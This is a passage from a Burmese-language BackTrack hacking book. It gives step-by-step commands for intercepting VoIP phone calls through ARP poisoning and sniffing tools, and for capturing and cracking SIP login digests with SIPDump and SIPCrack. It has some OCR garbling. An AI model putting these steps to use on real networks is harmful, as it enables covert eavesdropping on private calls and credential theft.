http://code.google.com/p/sipvicious/. သို႕သြားေရာက္ေလ့လာႏိုင္ပါသည္။
မ်က္ပြင့္စာေပ 227
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Monitoring, capturing, and eavesdropping


on VoIP traffic
ယခုအပိုင္းတြင္ VoIP traffic ေပၚတြင္ Montior ျပဳလုပ္ရန္၊ Capture ျပဳလုပ္ရန္ႏွင့္ ေခ်ာင္းေျမာင္းနား
ေထာင္ရန္ (eavesdrop) ကိုျပဳလုပ္ရန္အတြက္ BackTrack 5 Tool မ်ားကိုအသံုးျပဳ၍ လုပ္ေဆာင္ပံုကို
ေဖာ္ျပေပးမည္ျဖစ္သည္။ လုပ္ေဆာင္ခ်က္မ်ားလုပ္ေဆာင္ေနစဥ္တြင္ Program ႏွစ္ခု၏အကူအညီကိုယူ၍
လုပ္ေဆာင္ရပါမည္။ ထို Tool ႏွစ္ခုမွာ

 Arpspoof: ထို Program သည္ Network ေပၚတြင္ ARP poisoning attack ကို လုပ္
ေဆာင္ခြင့္ျပဳပါသည္။
 Wireshark: ထို Programသည္ Network Traffic ကုိဖမ္းယူရန္အတြက္ အသံုးျပဳပါသည္။
Wireshark ကို ေခ်ာင္းေျမာင္းနားေထာင္ရန္အတြက္ ဖမ္းယူထားေသာ RTP traffic
မ်ားကို နားေထာင္ႏိုင္ေသာ Audio ဖိုင္မ်ားအျဖစ္သို႕ ေျပာင္းလဲရန္လည္း အသံုးျပဳပါသည္။

ယခုအပိုင္းတြင္ေဖာ္ျပထားေသာ လုပ္ေဆာင္ခ်က္မ်ားကိုလုပ္ေဆာင္ရန္အတြက္ ေအာက္ပါ လိုအပ္ခ်က္မ်ား


ကို ျပည္႕စံုေအာင္ျပဳလုပ္ထားရပါမည္။

 Internet သိ႕ု မဟုတ္ Intranet ကိုအသံုးျပဳရပါမည္။


 Active Call အေတာအတြင္းတြင္ Network ေပၚမွ SIP သို႕မဟုတ္ PBX device မ်ားကို
လည္းလိုအပ္မည္ျဖစ္ပါသည္။

ၾကည္႕ရွဳျခင္း (Monitoring)၊ ဖမ္းယူျခင္း (Capturing) ႏွင့္ေခ်ာင္းေျမာင္းနားေထာင္ျခင္း (Eavesdropping)


ျခင္းလုပ္ငန္းစဥ္ကိုစတင္ႏိုင္ရန္အတြက္ Terminal Window ကိုဖြင့္၍ အသံုးျပဳရပါမည္။

၁။Terminal Window ကိုဖြင့္၍ IP forwarding ကိုဖြင့္လွစ္ရပါမည္။

echo 1 > /proc/sys/net/ipv4/ip_forward

228 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ ထို႕ေနာက္ ARP Poisoning attack ကိုစတင္ႏိုင္ရန္အတြက္ Arpspoof ကို launch လုပ္ရပါမည္။ Help
ဖိုင္ကို ၾကည္႕ရွဳရန္အတြက္ Command line ေပၚတြင္ arpspoof ဟုရိုက္ထည္႕ရံုသာျဖစ္သည္။

၃။ -t option ကိုအသံုးျပဳျခင္းျဖင့္ Target ႏွင့္ Gateway တုိ႕ကို သတ္မွတ္ရန္အသံုးျပဳႏိုင္ပါသည္။


အသံုးျပဳရမည္႕ပံုစံမွာ arpspoof –t [target] [gateway] သို႕မဟုတ္ arpspoof –t [gateway] [target]
တို႕ျဖစ္ပါသည္။ ေအာက္တြင္ေဖာ္ျပထားေသာ နည္းလမ္းႏွစ္မ်ိဳးမွ တစ္မ်ိဳးသံုး၍ Arpspoof ကို ေမာင္းႏွင္ႏိုင္
ပါသည္။

arpspoof –t 192.168.56.100 192.168.56.1

arpspoof –t 192.168.56.1 192.168.56.100

၄။ ထို႕ေနာက္ Network အတြင္းတြင္ေမာင္းႏွင္ထားေသာ Arpspoof ကို ရရိွပါမည္။ ထိုအခါ Wiresharp


ကိုအသံုးျပဳ၍ Packet အခ်ိဳ႕ကို ဖမ္းယူ (Capture) ျပဳလုပ္ရပါမည္။ ထိုသို႕ Wireshark ကိုစတင္ရန္အတြက္
Terminal Window ေနာက္တစ္ခုတြင္ wireshark ဟုရိုက္ထည္႕ေပးရပါမည္။

wireshark

မ်က္ပြင့္စာေပ 229
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၅။ Main Menu မွ Capture> Capture Filters ကိုေရြးခ်ယ္ရပါမည္။

၆။ Capture Filter dialogbox ေပၚတြင္ No Broadcast and no Multicast ကိုေရြးခ်ယ္ၿပီးေနာက္ Ok ကို


Click ႏိွပ္ေပးရပါမည္။

230 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၇။ Main Menu မွ Capture> Interfaces ကို ေရြးခ်ယ္ေပးရပါမည္။ ထိုသို႕မဟုတ္ Ctrl + I ကိုတြႏ


ဲ ိွပ္၍
လည္း အသံုးျပဳႏိုင္ပါသည္။

၈။ Capture Interfaces Dialog box ေပၚမွ Packets မ်ားကို ဖမ္းယူရန္အတြက္ Network Interface ကို
ေရြးခ်ယ္ၿပီးေနာက္ Start ကို Click ႏိွပ္ေပးရပါမည္။

၉။ အကယ္၍ Network ေပၚမွ Active ျဖစ္ေနေသာ Phone Call မ်ားရိွခဲ့ပါက Wireshark ၏ Display
ေပၚတြင္ Packet မ်ားကို ေတြ႕ျမင္ရမည္ျဖစ္သည္။ packet မ်ား ဖမ္းယူျခင္းမွ ရပ္တန္႕ရန္အတြက္ Ctrl + E
ကိုတြႏ
ဲ ိွပ္ျခင္း သို႕မဟုတ္ Capture> Stop ကုိေရြးခ်ယ္ႏိုင္ပါသည္။

၁၀။ ဖမ္းယူထားေသာ Phone Call မ်ားကိုနားေထာင္ရန္အတြက္ Wireshark မွ Telephony Feature ကို


အသံုးျပဳရမည္ျဖစ္ၿပီး ထိုသို႕ျပဳလုပ္ရန္အတြက္ Telephony> VoIP Calls ကို Menu မွေရြးခ်ယ္ရပါမည္။

မ်က္ပြင့္စာေပ 231
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၁။ ေရြးခ်ယ္ထားေသာ Call ကို သတ္မွတ္ၿပီးေနာက္ Player ခလုတ္တြင္ Click ႏိွပ္ေပးရပါမည္။

၁၂။ ထိုအခါ ေရြးခ်ယ္ထားေသာ စကားေျပာသံမ်ားကို ၾကားျဖတ္နားေထာင္ႏိုင္မည္ျဖစ္ပါသည္။

ယခုအပိုင္းတြင္ Target Network မွ Phone Call မ်ားကို စစ္ေဆးရန္၊ ဖမ္းယူရန္ႏွင့္ ၾကားျဖတ္နားေထာင္


ရန္အတြက္ Tool ႏွစ္ခုကို အသံုးျပဳခဲ့ၾကပါသည္။ ၾကားျဖတ္နားေထာင္ျခင္း (Davesdropping) သည္
Network ေပၚမွ Phone Call မ်ားကို လွ်ိဳ႕၀ွက္နားေထာင္ျခင္းအတြက္ ခြင့္ျပဳေပးပါသည္။ ထုိသ႕ို ျပဳလုပ္ျခင္း
ကို Arpspoof ကိုအသံုးျပဳ၍ Network ကို ARP Poisoning ျပဳလုပ္ျပီးေနာက္ Wireshark ကိုဆက္လက္
အသံုးျပဳ၍ Capture ျပဳလုပ္ျခင္း၊ Decode ျပဳလုပ္ျခင္းႏွင့္ ဖမ္းယူထားေသာ ဖုန္း Call မ်ားကို နားေထာင္ေစ
ျခင္းစသည္တို႕ျပဳလုပ္ႏိုင္ပါသည္။

Using VoIPong
ဖုန္းတစ္ခုအေပၚေခ်ာင္းေျမာင္းနားေထာင္ျခင္းသည္ ခြင့္ျပဳခ်က္မရိွဘဲ phone ေျပာဆိုမႈမ်ားကို ခိုးယူနား
ေထာင္ျခင္း လုပ္ေဆာင္ခ်က္တစ္ရပ္ပင္ျဖစ္သည္။ ယခုအပိုင္းတြင္ Target Network ေပၚမွ VoIP Call
မ်ားကို ေထာက္လွမ္းႏိုင္ရန္အတြက္ VoIPong အသံုးျပဳျခင္းကိုေဖာ္ျပေပးမည္ျဖစ္သည္။ ၄င္းသည္အမွန္
တကယ္ေျပာဆိုမႈမ်ား၏ WAV File မ်ားကိုပင္ျပန္လည္ထုတ္ေပးႏိုင္စြမ္းရိွပါသည္။ VoIPong သည္ VoIP
Call မ်ားကို ေထာက္လွမ္းမႈ ျပဳလုပ္ႏိုင္ေသာ အလြန္အမင္း ရိုးရွင္းသည္႕ Progam ျဖစ္သည္။ ထို႕ေၾကာင့္
Network တစ္ခုတြင္ ေခၚဆိုေသာ ဖုန္း Call တစ္ခုကို ၾကားျဖတ္နားေထာင္လိုေသာအခါ VoIP သည္
အလြန္အသံုး၀င္ေသာ Program ျဖစ္သည္ကို ျငင္းဆန္ႏိုင္မည္မဟုတ္ပါ။

232 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ယခုအပိုင္းကို ေအာင္ျမင္စြာ လုပ္ေဆာင္ႏိုင္ေစရန္အတြက္ ေအာက္ပါအခ်က္မ်ားကိုလိုအပ္ပါမည္။

 Internet သိ႕ု မဟုတ္ Intranet Connection တစ္ခုလိုအပ္ပါမည္။


 Network အတြင္းတြင္အသံုးျပဳမည္႕ SIP သိ႕ု မဟုတ္ PBX device မ်ားလိုအပ္ပါမည္။

၁။ Terminal Window ကိုဖြင့္၍ VoIPong configuration file ရိွရာလမ္းေၾကာင္းသို႕ေျပာင္းလဲေပးရပါမည္။

cd /usr/local/etc/voipong

၂။ VoIPong ကိုမစတင္မီအခ်ိန္အတြင္းတြင္ Configuartion file ကို အနည္းငယ္မွ်ျပင္ဆင္ေပးရပါမည္။


ထိုသို႕ျပင္ဆင္ရန္အတြက္ nano command ကိုအသံုးျပဳရပါမည္။

nano /etc/voipong.conf

၃။ Configuration file ပြင့္လာေသာအခါတြင္ [FILTERS] ဟူေသာစာေၾကာင္းကို ေတြ႕ေအာင္ရွာၿပီး


၄င္းအေပၚမွ outdir path ကို /usr/local/etc/voipong/output ဟူေသာလမ္းေၾကာင္းသို႕ေျပာင္းလဲေပး
ရပါမည္။

၄။ ထို႕ေနာက္ ဖိုင္ကုိ Save ျပဳလုပ္ၿပီး nano မွ ထြက္ေပးပါ။

၅။ VoIPong ကို Configure ျပဳလုပ္ၿပီးေသာအခါ help file ကို Launch ျပဳလုပ္ေပးရပါမည္။

voipong –h

၆။ ထို႕ေနာက္ VoIPong ကုိစတင္ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။ ထိုသို႕အသံုး


ျပဳသည္႕အခါတြင္ -c option ကိုအသံုးျပဳ၍ Configuration file လမ္းေၾကာင္းကို သတ္မွတ္ေပးရပါမည္။

voipong –c /etc/voipong.conf

မ်က္ပြင့္စာေပ 233
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၇။ VoiPong သည္ လက္ရိွေခၚဆိုေနေသာ ဖုန္း Call ကို စတင္ဖမ္းယူပါမည္။ ထို႕ေနာက္ ရရိွလာေသာ


ဖမ္းယူမႈမ်ားကို WAV file သို႕ေျပာင္းလဲၿပီးေနာက္ /usr/local/etc/voipong/output ဖိုဒါထဲတြင္
ထည္႕သြင္းေပးမည္ျဖစ္သည္။

ယခုအပိုင္းတြင္VoIPong ကိုအသံုးျပဳ၍ VoIP phone call တစ္ခုကို Capture ျပဳလုပ္ျခင္းကိုေဖာ္ျပခဲ့ပါ


သည္။ ယခုအပိုင္းကို VoiPong ပါ၀င္ေသာ Directory သို႕ေျပာင္းလဲၿပီး Program ကို Launch ျပဳလုပ္ျခင္း
ႏွင့္စတင္ခဲ့ပါသည္။ ထိ႕ု ေနာက္ Configuration file ကိုျပင္ဆင္ျခင္းကိုေဖာ္ျပေပးခဲ့ပါသည္။ ထိ႕ု အျပင္
VoiPong ၏အသံုးျပဳပံုကိုလည္းေလ့လာခဲ့ရၿပီး အခ်ဳပ္အားျဖင့္ဆိုရလွ်င္ VoiPong သည္ automate
ျပဳလုပ္ႏိုင္ေသာ Tool တစ္ခုျဖစ္ကာ Network တစ္ခုအတြင္းမွ VoIP ဖုန္း Call မ်ားကို ခိုးယူနားေထာင္
ရန္အတြက္အသံုးျပဳႏိုင္ပါသည္။

Mastering UCSniff
ယခုအပိုင္းတြင္ UCSniff ၏အသံုးျပဳပံုကိုေလ့လာၾကည္႕ၾကပါမည္။ Ucsniff သည္ VoIP ႏွင့္ IP Security
တို႕ကို Assement ျပဳလုပ္ႏိုင္ေသာ Tool တစ္ခုျဖစ္ပါသည္။ ၄င္းကို လံုၿခံဳေရးေဆာင္ရြက္သူမ်ားကို VoIP
Phone ႏွင့္ IP Video Call မ်ားမွ တရားမ၀င္ေသာ ေခ်ာင္းေျမာင္းနားေထာင္ျခင္းမ်ားကို စစ္ေဆးရန္
အတြက္ အသံုး၀င္လွေသာ Tool တစ္ခုအျဖစ္ အသံုးျပဳႏိုင္ပါသည္။

UCSniff တြင္ အဓိကလုပ္ေဆာင္ခ်က္ႏွစ္ရပ္ရိွပါသည္။

 Monitor Mode : ရိုးရိုးသာမန္ VoIP Sniffer အျဖစ္ေမာင္းႏွင္ျခင္းျဖစ္သည္။ Monitor


Mode ကို UCSniff ၏အလံုၿခံဳဆံုးေသာ Mode အျဖစ္လည္း သတ္မွတ္ႏိုင္ပါသည္။
သို႕ရာတြင္ ထိုးေဖာက္မႈ စမ္းသပ္ရန္အတြက္မွာမူ စြန႕္ စားရေသာ လုပ္ေဆာင္
ခ်က္မ်ားေၾကာင့္ အလြန္အမင္း အသံုးမျပဳႏိုင္ပါ။ အေၾကာင္းမွာ VoIP network အမ်ားစု
တြင္ အသံုး၀င္ေစေသာ Program ကိုျပဳလုပ္ရန္အတြက္ Setting မ်ားမရိွ၍ျဖစ္ပါသည္။
 Man-in-the-middle (MITM) mode : ယခု Mode အတြင္းတြင္ UCSniff သည္ Network
ကို ARP Poisoning ျပဳလုပ္ႏိုင္ပါသည္။ ၄င္းသည္ အမွန္တကယ္ တိုက္ခိုက္ေရး Mode

234 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ျဖစ္ၿပီး လုပ္ေဆာင္ခ်က္မ်ားကို ျပဳလုပ္သည္႕အခါတြင္ ေဖာ္ျပပါ Mode ကို အသံုးျပဳရပါ


သည္။ MITM mode တြင္ Submode ႏွစ္ခုထပ္မံပါရိွပါသည္။ ၄င္းတို႕မွာ
 Target Mode : ထုိ Mode သည္ UCSniff ၏ ေခ်ာင္းေျမာင္းနားေထာင္
ႏိုင္ေသာ Feature ကိုအသံုးျပဳႏိုင္ပါသည္။
 Learning Mode : ထို Mode သည္ Ettercap ကိုအသံုးျပဳ၍
သတ္မွတ္ထားေသာ Target ေပၚမွ အားလံုးေသာ Traffic မ်ားကို ဖမ္းယူ
ေစႏိုင္ပါသည္။

ယခုအပိုင္းကို လုပ္ေဆာင္ႏို္င္ရန္အတြက္

 Internet သိ႕ု မဟုတ္ Intranet Connection တစ္ခုႏွင့္


 Network ေပၚတြင္အသံုးျပဳရသည္႕ SIP သို႕မဟုတ္ PBX Device မ်ားကိုလိုအပ္ပါမည္။

UCSniff ကို Install ျပဳလုပ္ျခင္းျဖင့္ စတင္ၾကည္႕ပါမည္။

၁။ http://sourceforge.net/projects/ucsniff/files/ucsniff/ucsniff-3.2%20src/ သိ႕ု သြားေရာက္၍


/download folder အတြင္းသို႕ UCSniff 3.20 ကို Download ျပဳလုပ္၍ ထည္႕သြင္းေပးပါ။

၂။ Downloads Folder ၏ လမ္းေၾကာင္းသို႕ ေအာက္ပါ Command ကိုအသံုးျပဳ၍ ေျပာင္းလဲေပးရပါမည္။

cd /downloads

၃။ ေအာက္ပါ Command ကိုအသံုးျပဳ၍ UCSniff ကို Untar ျပဳလုပ္ပါ။

tar xzvf ucsniff-3.20.tar.gz

၄။ ထို႕ေနာက္ SCSniff-3.20 ၏ Directory လမ္းေၾကာင္းသို႕ေျပာင္းလဲေပးရပါမည္။

cd ucsniff-3.20

၅။ ထို႕ေနာက္ လိုအပ္ခ်က္မ်ားကိုလုိက္၍ Download ျပဳလုပ္ေပးရပါမည္။ ထို႕ေၾကာင့္ ေအာက္တြင္


ေဖာ္ျပထားေသာ Command မ်ားကို တစ္ႀကိမ္တြင္ တစ္ခုစီ ရိုက္ထည္႕၍ ေမာင္းႏွင္ေပးရပါမည္။

မ်က္ပြင့္စာေပ 235
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

apt-get update
apt-get install build-essential
apt-get install zlib1g-dev liblzo2-dev
apt-get install libpcap0.8-dev libnet1-dev
apt-get install libasound2-dev
apt-get install libbz2-dev
apt-get install libx11-dev
apt-get install libxext-dev
apt-get install libfreetype6-dev
apt-get install vlc
apt-get install libvlc-dev
apt-get install libavformat-dev
apt-get install libavdevice-dev
apt-get install libswscale-dev
apt-get install libavfilter-dev
apt-get install libx264-dev
apt-get install libav

၆။ ထို႕ေနာက္ VLC ႏွင့္ GUI Support တို႕ႏွင့္ UCSniff ကို Configure ျပဳလုပ္ရန္လိုအပ္ပါမည္။

./configure --enable –libvlc --enable-gui

236 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၇။ ထို႕ေနာက္ UCSniff ကို Configure ျပဳလုပ္ၿပီး ၄င္းကို Install ျပဳလုပ္ရပါမည္။

make

make install

၈။ ထို႕အျပင္ ./ucsniff –G command ကို executing ျပဳလုပ္ၿပီးေနာက္တြင္ UCSniff ၏ GUI version ကို
Launch ျပဳလုပ္ႏိုင္ပါသည္။

မ်က္ပြင့္စာေပ 237
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၉။ Interface ကုိေရြးခ်ယ္ျခင္းျဖင့္ စတင္ရပါမည္။ ေအာက္ပါပံုတြင္ေဖာ္ျပထားေသာ ကြျဲ ပားျခားနားေသာ


ေရြးခ်ယ္မႈမ်ားကို ျပဳလုပ္ေပးႏိုင္ပါသည္။

၁၀။ ထို႕ေနာက္ Mode ကိုေရြးခ်ယ္ေပးရန္ လုိအပ္ပါမည္။ ၄င္း Mode မွ ခြင့္ျပဳေပးေသာ အမွန္တကယ္


လုပ္ေဆာင္ေပးေသာ တရား၀င္ေသာ Attack သသသည္ MitM Mode ျဖစ္ပါသည္။ MitM mode
ကိုေရြးခ်ယ္ၿပီးေသာအခါ Option အသစ္ႏွစ္ခုကိုေတြ႕ရမည္ျဖစ္ၿပီး ၄င္းတို႕မွာ Learning ႏွင့္ Target Mode
တို႕ပင္ျဖစ္သည္။

238 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၁။ Miscellaneous Option ေအာက္တြင္ မည္သည္႕ Option ကိုမွ မေရြးခ်ယ္ရပါ။ သို႕ေသာ္လည္း


ေအာက္တြင္ေဖာ္ျပထားေသာ Option မ်ားပါ၀င္ပါသည္။

 Enable arp Request poisoning


 Enable SIP log
 Enable Verbose mode
 Bypass of GARP Disablement
 Enable TFTP Modify Attack
 Enable Mixing A/V တိ႕ု ျဖစ္သည္။

၁၂။ ထို႕ေနာက္ စတင္ရန္အတြက္ Start UCSniff ခလုတ္တြင္ Click တစ္ခ်က္ႏိွပ္ပါ။

၁၃။ Scan ျပဳလုပ္ျခင္းၿပီးဆံုးေသာအခါ Scan ကိုအဆံုးသတ္ရန္အတြက္ Stop UCSniff ခလုတ္တြင္


တစ္ခ်က္ႏိွပ္ေပးပါ။

ယခုအပိုင္းတြင္ Network ေပၚမွ VoIP traffic ကို ေစာင့္ၾကည္႕ရန္အတြက္ MITM Mode အတြင္းတြင္
UCSniff ကိုသတ္မွတ္ခဲ့ရပါသည္။ UCSniff သည္ Network ကို ARP Poisoning ျပဳလုပ္ျခင္းႏွင့္
ေမာင္းႏွင္ထားျခင္းကို အဆံုးမသတ္မခ်င္း Packet မ်ားကို စုေဆာင္းျခင္းကိုစတင္ေပးပါမည္။

မ်က္ပြင့္စာေပ 239
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Mastering Xplico
ယခုအပိုင္းတြင္ Xplico ကိုအသံုးျပဳၾကည္႕ၾကပါမည္။ Xplico သည္ Internet Traffic Caputre Tool တစ္ခု
ျဖစ္ၿပီး ၄င္းတြင္ FTP, e-mail, VoIP ႏွင့္အျခားေသာ လုပ္ေဆာင္ခ်က္မ်ားအပါအ၀င္ ကြျဲ ပားျခားနားေသာ
Application မ်ားမွ Data မ်ားကို ဖမ္းယူရန္အတြက္ အသံုးျပဳႏိုင္ပါသည္။ Xplico သည္ Network Forensic
Analysis Tool (NFAT) တစ္ခုအျဖစ္ အလြန္အသံုး၀င္လွပါသည္။

ယခုအပိုင္းကိုလုပ္ေဆာင္ႏိုင္ရန္အတြက္

 Internet သိ႕ု မဟုတ္ Intranet Connection ႏွင့္


 SIP သိ႕ု မဟုတ္ PBX Device မ်ားကိုလိုအပ္ပါမည္။

Xplico ကို Install ျပဳလုပ္ျခင္းကို စတင္လုပ္ေဆာင္ၾကည္႕ပါမည္။ ထို႕ေၾကာင့္ ေအာက္ပါအတိုင္း အဆင့္


ဆင့္လုပ္ေဆာင္ေပးပါ။

၁။ Terminal Window ကိုဖြင့္၍ Local Repository မ်ားကို Update ျပဳလုပ္ပါ။

apt –get update

၂။ Xplico ကို Install ျပဳလုပ္ရန္ ေအာက္ပါ Command ကိုအသံုးျပဳပါ။

apt –get install xplico

240 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ Xplico ကို BackTrack> Digital Forensics> Forensic Analysis Menu တြင္ ထည္႕သြင္းေပးပါလိမ့္
မည္။

၄။ Terminal Window တစ္ခုကိုဖြင့္၍ Xplico ရိွသည္႕ Folder ၏လမ္းေၾကာင္းကို ေျပာင္းလဲရန္ ေအာက္ပါ


Command ကိုအသံုးျပဳပါ။

cd /opt/xplico/bin

၅။ Xplico ၏ Help ဖိုင္ကို ၾကည္႕ရွဳရန္ Xplico ကုိဖြင့္ပါ။

၆။ ေနာက္ဆံုးအဆင့္အရ Real Time တြင္ Conversation မ်ားကို Decode ျပဳလုပ္ရန္အတြက္ ေအာက္ပါ


Command ကိုအသံုးျပဳပါ။

./xplico –m rltm -i eth0

 -m : ထို Option သည္ အသံုးျပဳမည္႕ Mode ကိုေရြးခ်ယ္ရန္အသံုးျပဳပါသည္။


ယခုေနရာတြင္ Real Time Mode ကိုသတ္မွတ္ရန္အတြက္ rltm ဟုသံုးစြရ
ဲ ပါသည္။
 -i : ထို Option သည္ Interface ကိုသတ္မွတ္ရန္အတြက္ အသံုးျပဳႏိုင္ပါသည္။

ယခုအပိုင္းတြင္ SIP Traffic ကို ဖမ္းယူရန္အတြက္ Xplico ကိုအသံုးျပဳခဲ့ပါသည္။ Xplico ကို Network
ေပၚမွ Packet မ်ားကို analyze ျပဳလုပ္ရန္ သံုးစြၿဲ ပီး အဖိုးတန္ေသာ အခ်က္အလက္မ်ားကို ရရိွရန္အတြက္

မ်က္ပြင့္စာေပ 241
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ကိုလည္း သရုပ္ချြဲ ခင္း (parsing) လုပ္ေဆာင္ခိုင္းႏိုင္ပါသည္။ ထို႕ေနာက္ ၄င္းသည္ သူ၏ SQLite


database တြင္ အခ်က္အလက္မ်ားကိုလည္း သိမ္းဆည္းေစပါသည္။

Capturing SIP authentication


ယခုအပိုင္းတြင္ SIPCrack Suit ၏အစိတ္အပိုင္းတစ္ခုျဖစ္ေသာ SIPDump ဟူေသာ Tool ကိုအသံုးျပဳ၍
SIP authentication traffic ကို ဖမ္းယူျခင္းကို ေဖာ္ျပေပးမည္ျဖစ္သည္။ SIPDump သည္ SIP login
sniffer/cracker တစ္ခုျဖစ္ၿပီး Network ၏ ကိန္းဂဏန္းပံုစံ authentication information မ်ားကို
ဖမ္းယူေစႏိုင္ပါသည္။ ၄င္း Tool ကို မိတ္ဖက္ Tool တစ္ခုျဖစ္ေသာ SIPCrack ကိုတြ၍
ဲ အသံုးျပဳျခင္းျဖင့္
Login Information မ်ားကို Capture ျပဳလုပ္ျခင္းသာမက SIPDump ျဖင့္ တည္ေဆာက္ထားေသာ File
မ်ားကိုလည္း Crack ျပဳလုပ္ႏိုင္ေစမည္ျဖစ္သည္။

ယခုအပိုင္းကို လုပ္ေဆာင္ႏိုင္ရန္အတြက္

 Internet သိ႕ု မဟုတ္ Intranet Connection တစ္ခု


 SIP သိ႕ု မဟုတ္ PBX Device မ်ားကို လိုအပ္မည္ျဖစ္သည္။

SIPDump ကိုအသံုးျပဳ၍ SIP authentication မ်ားကို ဖမ္းယူရန္အတြက္

၁။ Terminal Window ကိုဖြင့္၍ SIPDump ရိွသည္႕ Folder လမ္းေၾကာင္းကို ညြန္းေပးရပါမည္။

cd /pentest/passwords/sipcrack

၂။ ထိ႕ု ေနာက္ SIPDump ၏ Help ဖိုင္ကို ၾကည္႕ရွဳရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

./sipdump

242 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ ေနာက္ဆံုးအဆင့္အရ Live Capture Mode အတြက္ SIPDump ကိုသတ္မွတ္ေပးရပါမည္။

/sipdump –i eth0 capture.txt

ယခုအပိုင္းတြင္ SIP authentication Traffic ကို ဖမ္းယူ (Capture) ျပဳလုပ္ရန္အတြက္ SIPDump


ကိုအသံုးျပဳခဲ့ပါသည္။ ယခုအပိုင္းကို SIPDump ပါ၀င္ေသာ Directory ကိုလမ္းညြန္ျခင္းျဖင့္ စတင္ခဲ့ၿပီး
Help ဖိုင္ကို ၾကည္႕ရွဳၿပီးေသာအခါတြင္ Live Capture Mode သို႕သတ္မွတ္ရန္ Command တစ္ခုကို
အသံုးျပဳခဲ့ရပါသည္။ ထို႕ေနာက္ ဖမ္းယူထားေသာ digest မ်ားကို Capture.txt ဟုေခၚေသာ Text ဖိုင္
တစ္ခုျဖင့္ Output ျပဳလုပ္ေပးခဲ့ပါသည္။

SIPCrack ကိုအသံုးျပဳျခင္းျဖင့္ ယခုအပိုင္း၏ ေနာက္ဆက္တြလ


ဲ ုပ္ေဆာင္ခ်က္ကို ေဖာ္ျပေပးပါမည္။ တူညီ
ေသာ Directory လမ္းေၾကာင္းအတြင္းသို႕ေရာက္ရိွေနေသာအခါတြင္ SIPCrack ၏ Help ဖိုင္ကိုၾကည္႕ရွဳ
ရန္အတြက္ ./sipcrack ဟုရက
ို ္ထည္႕အသံုးျပဳႏိုင္ေၾကာင္း မွတ္သားထားပါ။

မ်က္ပြင့္စာေပ 243
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ေနာက္ဆံုးအရ SIPDump ကိုအသံုးျပဳတည္ေဆာက္ထားေသာ Capture.txt ကို Wordlist ဖိုင္တစ္ခုအျဖစ္


အသံုးျပဳ၍ ေအာက္ပါ Command ကိုသံုးစြႏ
ဲ ိုင္ပါသည္။

./sipcrack –w /pentest/passwords/wordlists/darkcode.txt capture.txt

Mastering VoIP Hopper


ယခုအပိုင္းတြင္ VoIP Hopper ကို ကၽြမ္းက်င္ေစရန္အတြက္ Tool တစ္ခုကိုေရြးခ်ယ္ထားပါသည္။ VoIP
Hopper သည္ VLAN သို႕မဟုတ္ Virtual Local Area Network ထဲတြင္ IP Phone ကဲ့သို႕
လုပ္ေဆာင္ျခင္းျဖင့္ Hops ျပဳလုပ္ေစႏိုင္ေသာ Tool တစ္ခုျဖစ္ပါသည္။ ၄င္းကို VLAN တစ္ခု၏ Security
infrastructure ကိုစမ္းသပ္ရန္အတြက္ အဓိကအသံုးျပဳရေသာ Tool တစ္ခုလည္းျဖစ္ပါသည္။

ယခုအပိုင္းကိုၿပီးျပည္႕စံုေအာင္ စမ္းသပ္ႏိုင္ရန္အတြက္

 Internet သိ႕ု မဟုတ္ Intranet Connection တစ္ခု


 SIP သိ႕ု မဟုတ္ PBX device မ်ားကိုလိုအပ္ပါမည္။

